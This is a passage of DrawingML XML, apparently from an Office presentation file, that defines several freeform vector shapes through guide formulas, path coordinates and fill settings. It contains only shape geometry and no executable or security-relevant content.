                      <a:pt x="42" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="11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29" name="Freeform 247">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A34879E-8D6F-4AE6-90C0-978252D28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363"/>
                <a:ext cx="202" cy="162"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 202"/>
                  <a:gd name="T1" fmla="*/ 90 h 162"/>
                  <a:gd name="T2" fmla="*/ 1 w 202"/>
                  <a:gd name="T3" fmla="*/ 75 h 162"/>
                  <a:gd name="T4" fmla="*/ 1 w 202"/>
                  <a:gd name="T5" fmla="*/ 57 h 162"/>
                  <a:gd name="T6" fmla="*/ 2 w 202"/>
                  <a:gd name="T7" fmla="*/ 43 h 162"/>
                  <a:gd name="T8" fmla="*/ 10 w 202"/>
                  <a:gd name="T9" fmla="*/ 36 h 162"/>
                  <a:gd name="T10" fmla="*/ 21 w 202"/>
                  <a:gd name="T11" fmla="*/ 31 h 162"/>
                  <a:gd name="T12" fmla="*/ 45 w 202"/>
                  <a:gd name="T13" fmla="*/ 24 h 162"/>
                  <a:gd name="T14" fmla="*/ 80 w 202"/>
                  <a:gd name="T15" fmla="*/ 17 h 162"/>
                  <a:gd name="T16" fmla="*/ 87 w 202"/>
                  <a:gd name="T17" fmla="*/ 16 h 162"/>
                  <a:gd name="T18" fmla="*/ 92 w 202"/>
                  <a:gd name="T19" fmla="*/ 17 h 162"/>
                  <a:gd name="T20" fmla="*/ 93 w 202"/>
                  <a:gd name="T21" fmla="*/ 15 h 162"/>
                  <a:gd name="T22" fmla="*/ 95 w 202"/>
                  <a:gd name="T23" fmla="*/ 13 h 162"/>
                  <a:gd name="T24" fmla="*/ 97 w 202"/>
                  <a:gd name="T25" fmla="*/ 14 h 162"/>
                  <a:gd name="T26" fmla="*/ 100 w 202"/>
                  <a:gd name="T27" fmla="*/ 14 h 162"/>
                  <a:gd name="T28" fmla="*/ 101 w 202"/>
                  <a:gd name="T29" fmla="*/ 11 h 162"/>
                  <a:gd name="T30" fmla="*/ 104 w 202"/>
                  <a:gd name="T31" fmla="*/ 9 h 162"/>
                  <a:gd name="T32" fmla="*/ 107 w 202"/>
                  <a:gd name="T33" fmla="*/ 9 h 162"/>
                  <a:gd name="T34" fmla="*/ 110 w 202"/>
                  <a:gd name="T35" fmla="*/ 9 h 162"/>
                  <a:gd name="T36" fmla="*/ 110 w 202"/>
                  <a:gd name="T37" fmla="*/ 6 h 162"/>
                  <a:gd name="T38" fmla="*/ 114 w 202"/>
                  <a:gd name="T39" fmla="*/ 0 h 162"/>
                  <a:gd name="T40" fmla="*/ 196 w 202"/>
                  <a:gd name="T41" fmla="*/ 1 h 162"/>
                  <a:gd name="T42" fmla="*/ 196 w 202"/>
                  <a:gd name="T43" fmla="*/ 8 h 162"/>
                  <a:gd name="T44" fmla="*/ 197 w 202"/>
                  <a:gd name="T45" fmla="*/ 15 h 162"/>
                  <a:gd name="T46" fmla="*/ 198 w 202"/>
                  <a:gd name="T47" fmla="*/ 19 h 162"/>
                  <a:gd name="T48" fmla="*/ 200 w 202"/>
                  <a:gd name="T49" fmla="*/ 26 h 162"/>
                  <a:gd name="T50" fmla="*/ 201 w 202"/>
                  <a:gd name="T51" fmla="*/ 35 h 162"/>
                  <a:gd name="T52" fmla="*/ 200 w 202"/>
                  <a:gd name="T53" fmla="*/ 40 h 162"/>
                  <a:gd name="T54" fmla="*/ 197 w 202"/>
                  <a:gd name="T55" fmla="*/ 45 h 162"/>
                  <a:gd name="T56" fmla="*/ 195 w 202"/>
                  <a:gd name="T57" fmla="*/ 50 h 162"/>
                  <a:gd name="T58" fmla="*/ 191 w 202"/>
                  <a:gd name="T59" fmla="*/ 52 h 162"/>
                  <a:gd name="T60" fmla="*/ 185 w 202"/>
                  <a:gd name="T61" fmla="*/ 52 h 162"/>
                  <a:gd name="T62" fmla="*/ 176 w 202"/>
                  <a:gd name="T63" fmla="*/ 55 h 162"/>
                  <a:gd name="T64" fmla="*/ 174 w 202"/>
                  <a:gd name="T65" fmla="*/ 59 h 162"/>
                  <a:gd name="T66" fmla="*/ 169 w 202"/>
                  <a:gd name="T67" fmla="*/ 62 h 162"/>
                  <a:gd name="T68" fmla="*/ 162 w 202"/>
                  <a:gd name="T69" fmla="*/ 64 h 162"/>
                  <a:gd name="T70" fmla="*/ 154 w 202"/>
                  <a:gd name="T71" fmla="*/ 66 h 162"/>
                  <a:gd name="T72" fmla="*/ 141 w 202"/>
                  <a:gd name="T73" fmla="*/ 67 h 162"/>
                  <a:gd name="T74" fmla="*/ 131 w 202"/>
                  <a:gd name="T75" fmla="*/ 67 h 162"/>
                  <a:gd name="T76" fmla="*/ 123 w 202"/>
                  <a:gd name="T77" fmla="*/ 67 h 162"/>
                  <a:gd name="T78" fmla="*/ 116 w 202"/>
                  <a:gd name="T79" fmla="*/ 66 h 162"/>
                  <a:gd name="T80" fmla="*/ 110 w 202"/>
                  <a:gd name="T81" fmla="*/ 69 h 162"/>
                  <a:gd name="T82" fmla="*/ 100 w 202"/>
                  <a:gd name="T83" fmla="*/ 68 h 162"/>
                  <a:gd name="T84" fmla="*/ 57 w 202"/>
                  <a:gd name="T85" fmla="*/ 74 h 162"/>
                  <a:gd name="T86" fmla="*/ 45 w 202"/>
                  <a:gd name="T87" fmla="*/ 75 h 162"/>
                  <a:gd name="T88" fmla="*/ 50 w 202"/>
                  <a:gd name="T89" fmla="*/ 97 h 162"/>
                  <a:gd name="T90" fmla="*/ 50 w 202"/>
                  <a:gd name="T91" fmla="*/ 108 h 162"/>
                  <a:gd name="T92" fmla="*/ 48 w 202"/>
                  <a:gd name="T93" fmla="*/ 121 h 162"/>
                  <a:gd name="T94" fmla="*/ 45 w 202"/>
                  <a:gd name="T95" fmla="*/ 139 h 162"/>
                  <a:gd name="T96" fmla="*/ 45 w 202"/>
                  <a:gd name="T97" fmla="*/ 156 h 162"/>
                  <a:gd name="T98" fmla="*/ 35 w 202"/>
                  <a:gd name="T99" fmla="*/ 158 h 162"/>
                  <a:gd name="T100" fmla="*/ 22 w 202"/>
                  <a:gd name="T101" fmla="*/ 160 h 162"/>
                  <a:gd name="T102" fmla="*/ 11 w 202"/>
                  <a:gd name="T103" fmla="*/ 161 h 162"/>
                  <a:gd name="T104" fmla="*/ 0 w 202"/>
                  <a:gd name="T105" fmla="*/ 159 h 162"/>
                  <a:gd name="T106" fmla="*/ 0 w 202"/>
                  <a:gd name="T107" fmla="*/ 143 h 162"/>
                  <a:gd name="T108" fmla="*/ 0 w 202"/>
                  <a:gd name="T109" fmla="*/ 117 h 162"/>
                  <a:gd name="T110" fmla="*/ 0 w 202"/>
                  <a:gd name="T111" fmla="*/ 94 h 162"/>
                  <a:gd name="T112" fmla="*/ 0 w 202"/>
                  <a:gd name="T113" fmla="*/ 90 h 16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2"/>
                  <a:gd name="T172" fmla="*/ 0 h 162"/>
                  <a:gd name="T173" fmla="*/ 202 w 202"/>
                  <a:gd name="T174" fmla="*/ 162 h 16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2" h="162">
                    <a:moveTo>
                      <a:pt x="0" y="90"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="191" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="161"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="90"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="60606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0" name="Freeform 248">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{700FED63-4A5E-48B4-9314-EFD71B5A9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" y="2368"/>
                <a:ext cx="195" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 188 w 195"/>
                  <a:gd name="T1" fmla="*/ 7 h 153"/>
                  <a:gd name="T2" fmla="*/ 193 w 195"/>
                  <a:gd name="T3" fmla="*/ 16 h 153"/>
                  <a:gd name="T4" fmla="*/ 189 w 195"/>
                  <a:gd name="T5" fmla="*/ 41 h 153"/>
                  <a:gd name="T6" fmla="*/ 178 w 195"/>
                  <a:gd name="T7" fmla="*/ 41 h 153"/>
                  <a:gd name="T8" fmla="*/ 166 w 195"/>
                  <a:gd name="T9" fmla="*/ 51 h 153"/>
                  <a:gd name="T10" fmla="*/ 138 w 195"/>
                  <a:gd name="T11" fmla="*/ 57 h 153"/>
                  <a:gd name="T12" fmla="*/ 112 w 195"/>
                  <a:gd name="T13" fmla="*/ 57 h 153"/>
                  <a:gd name="T14" fmla="*/ 122 w 195"/>
                  <a:gd name="T15" fmla="*/ 49 h 153"/>
                  <a:gd name="T16" fmla="*/ 109 w 195"/>
                  <a:gd name="T17" fmla="*/ 57 h 153"/>
                  <a:gd name="T18" fmla="*/ 97 w 195"/>
                  <a:gd name="T19" fmla="*/ 60 h 153"/>
                  <a:gd name="T20" fmla="*/ 106 w 195"/>
                  <a:gd name="T21" fmla="*/ 54 h 153"/>
                  <a:gd name="T22" fmla="*/ 91 w 195"/>
                  <a:gd name="T23" fmla="*/ 60 h 153"/>
                  <a:gd name="T24" fmla="*/ 47 w 195"/>
                  <a:gd name="T25" fmla="*/ 65 h 153"/>
                  <a:gd name="T26" fmla="*/ 45 w 195"/>
                  <a:gd name="T27" fmla="*/ 95 h 153"/>
                  <a:gd name="T28" fmla="*/ 40 w 195"/>
                  <a:gd name="T29" fmla="*/ 148 h 153"/>
                  <a:gd name="T30" fmla="*/ 15 w 195"/>
                  <a:gd name="T31" fmla="*/ 152 h 153"/>
                  <a:gd name="T32" fmla="*/ 0 w 195"/>
                  <a:gd name="T33" fmla="*/ 115 h 153"/>
                  <a:gd name="T34" fmla="*/ 3 w 195"/>
                  <a:gd name="T35" fmla="*/ 66 h 153"/>
                  <a:gd name="T36" fmla="*/ 2 w 195"/>
                  <a:gd name="T37" fmla="*/ 44 h 153"/>
                  <a:gd name="T38" fmla="*/ 15 w 195"/>
                  <a:gd name="T39" fmla="*/ 29 h 153"/>
                  <a:gd name="T40" fmla="*/ 54 w 195"/>
                  <a:gd name="T41" fmla="*/ 17 h 153"/>
                  <a:gd name="T42" fmla="*/ 86 w 195"/>
                  <a:gd name="T43" fmla="*/ 11 h 153"/>
                  <a:gd name="T44" fmla="*/ 107 w 195"/>
                  <a:gd name="T45" fmla="*/ 23 h 153"/>
                  <a:gd name="T46" fmla="*/ 92 w 195"/>
                  <a:gd name="T47" fmla="*/ 15 h 153"/>
                  <a:gd name="T48" fmla="*/ 91 w 195"/>
                  <a:gd name="T49" fmla="*/ 9 h 153"/>
                  <a:gd name="T50" fmla="*/ 97 w 195"/>
                  <a:gd name="T51" fmla="*/ 11 h 153"/>
                  <a:gd name="T52" fmla="*/ 107 w 195"/>
                  <a:gd name="T53" fmla="*/ 16 h 153"/>
                  <a:gd name="T54" fmla="*/ 98 w 195"/>
                  <a:gd name="T55" fmla="*/ 7 h 153"/>
                  <a:gd name="T56" fmla="*/ 106 w 195"/>
                  <a:gd name="T57" fmla="*/ 4 h 153"/>
                  <a:gd name="T58" fmla="*/ 119 w 195"/>
                  <a:gd name="T59" fmla="*/ 13 h 153"/>
                  <a:gd name="T60" fmla="*/ 109 w 195"/>
                  <a:gd name="T61" fmla="*/ 2 h 153"/>
                  <a:gd name="T62" fmla="*/ 115 w 195"/>
                  <a:gd name="T63" fmla="*/ 0 h 153"/>
                  <a:gd name="T64" fmla="*/ 125 w 195"/>
                  <a:gd name="T65" fmla="*/ 7 h 153"/>
                  <a:gd name="T66" fmla="*/ 143 w 195"/>
                  <a:gd name="T67" fmla="*/ 5 h 153"/>
                  <a:gd name="T68" fmla="*/ 148 w 195"/>
                  <a:gd name="T69" fmla="*/ 7 h 153"/>
                  <a:gd name="T70" fmla="*/ 166 w 195"/>
                  <a:gd name="T71" fmla="*/ 10 h 153"/>
                  <a:gd name="T72" fmla="*/ 169 w 195"/>
                  <a:gd name="T73" fmla="*/ 5 h 153"/>
                  <a:gd name="T74" fmla="*/ 177 w 195"/>
                  <a:gd name="T75" fmla="*/ 10 h 153"/>
                  <a:gd name="T76" fmla="*/ 184 w 195"/>
                  <a:gd name="T77" fmla="*/ 5 h 15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153"/>
                  <a:gd name="T119" fmla="*/ 195 w 195"/>
                  <a:gd name="T120" fmla="*/ 153 h 15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153">
                    <a:moveTo>
                      <a:pt x="188" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="188" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="2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1" name="Freeform 249">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37EFCEC2-7E90-4428-9488-BAAD3F95C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" y="2394"/>
                <a:ext cx="22" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 22"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 11 w 22"/>
                  <a:gd name="T3" fmla="*/ 16 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 22"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 21 w 22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"/>
                  <a:gd name="T13" fmla="*/ 0 h 17"/>
                  <a:gd name="T14" fmla="*/ 22 w 22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" h="17">
                    <a:moveTo>
                      <a:pt x="21" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="11" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21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2" name="Freeform 250">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B9FA045-29DB-4D03-90AD-364B5DA12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238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1 w 17"/>
                  <a:gd name="T3" fmla="*/ 16 h 17"/>
                  <a:gd name="T4" fmla="*/ 0 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 12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1" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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3" name="Freeform 251">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3019705E-151F-484E-9487-4322344E3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383"/>
                <a:ext cx="25" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 25"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 13 w 25"/>
                  <a:gd name="T3" fmla="*/ 1 h 17"/>
                  <a:gd name="T4" fmla="*/ 11 w 25"/>
                  <a:gd name="T5" fmla="*/ 3 h 17"/>
                  <a:gd name="T6" fmla="*/ 11 w 25"/>
                  <a:gd name="T7" fmla="*/ 8 h 17"/>
                  <a:gd name="T8" fmla="*/ 10 w 25"/>
                  <a:gd name="T9" fmla="*/ 12 h 17"/>
                  <a:gd name="T10" fmla="*/ 0 w 25"/>
                  <a:gd name="T11" fmla="*/ 16 h 17"/>
                  <a:gd name="T12" fmla="*/ 12 w 25"/>
                  <a:gd name="T13" fmla="*/ 16 h 17"/>
                  <a:gd name="T14" fmla="*/ 14 w 25"/>
                  <a:gd name="T15" fmla="*/ 4 h 17"/>
                  <a:gd name="T16" fmla="*/ 24 w 25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17"/>
                  <a:gd name="T29" fmla="*/ 25 w 25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17">
                    <a:moveTo>
                      <a:pt x="24" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="4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4" name="Freeform 252">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A7A2C9E-DE10-4DB0-AA58-72BBC1E61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410"/>
                <a:ext cx="81" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 80 w 81"/>
                  <a:gd name="T1" fmla="*/ 0 h 17"/>
                  <a:gd name="T2" fmla="*/ 59 w 81"/>
                  <a:gd name="T3" fmla="*/ 0 h 17"/>
                  <a:gd name="T4" fmla="*/ 39 w 81"/>
                  <a:gd name="T5" fmla="*/ 4 h 17"/>
                  <a:gd name="T6" fmla="*/ 23 w 81"/>
                  <a:gd name="T7" fmla="*/ 5 h 17"/>
                  <a:gd name="T8" fmla="*/ 11 w 81"/>
                  <a:gd name="T9" fmla="*/ 7 h 17"/>
                  <a:gd name="T10" fmla="*/ 5 w 81"/>
                  <a:gd name="T11" fmla="*/ 12 h 17"/>
                  <a:gd name="T12" fmla="*/ 0 w 81"/>
                  <a:gd name="T13" fmla="*/ 16 h 17"/>
                  <a:gd name="T14" fmla="*/ 5 w 81"/>
                  <a:gd name="T15" fmla="*/ 15 h 17"/>
                  <a:gd name="T16" fmla="*/ 11 w 81"/>
                  <a:gd name="T17" fmla="*/ 8 h 17"/>
                  <a:gd name="T18" fmla="*/ 28 w 81"/>
                  <a:gd name="T19" fmla="*/ 7 h 17"/>
                  <a:gd name="T20" fmla="*/ 39 w 81"/>
                  <a:gd name="T21" fmla="*/ 7 h 17"/>
                  <a:gd name="T22" fmla="*/ 46 w 81"/>
                  <a:gd name="T23" fmla="*/ 4 h 17"/>
                  <a:gd name="T24" fmla="*/ 60 w 81"/>
                  <a:gd name="T25" fmla="*/ 2 h 17"/>
                  <a:gd name="T26" fmla="*/ 80 w 81"/>
                  <a:gd name="T27" fmla="*/ 0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1"/>
                  <a:gd name="T43" fmla="*/ 0 h 17"/>
                  <a:gd name="T44" fmla="*/ 81 w 81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1" h="17">
                    <a:moveTo>
                      <a:pt x="80" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
